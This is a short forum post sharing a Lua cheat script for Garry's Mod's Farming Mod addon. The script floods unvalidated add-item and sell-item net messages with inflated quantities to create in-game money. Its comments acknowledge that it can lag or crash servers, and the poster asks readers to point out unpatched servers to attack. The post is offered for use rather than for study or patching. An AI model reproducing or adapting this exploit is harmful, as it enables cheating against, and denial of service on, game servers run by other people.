Someone posted a Fishing Mod money exploit a while back and said it was interchangeable with Farming Mod but it was a little more tricky than that because the addons net.WriteTables are formatted differently. If you find a server that doesn't have this patched I'd be interested in knowing!
Code:
concommand.Add( "_farmingmoney", function() farmingmoney() end )
function farmingmoney() for i=1,500 do -- sends the netmessage x amount of times, depending on how large, it could lag/crash a server net.Start("FARMINGMOD_ADDITEM") net.WriteTable({name="Peach"}) -- you can change this to any other fruit/veggie but on most servers this is the best net.WriteInt(1000000000, 16) -- couldn't get the number to go higher than this net.SendToServer()
net.Start("FARMINGMOD_SELLITEM") net.WriteTable({name="Peach"}) -- you can change this to any other fruit/veggie but on most servers this is the best net.WriteInt(1000000000, 16) -- couldn't get the number to go higher than this net.SendToServer() end end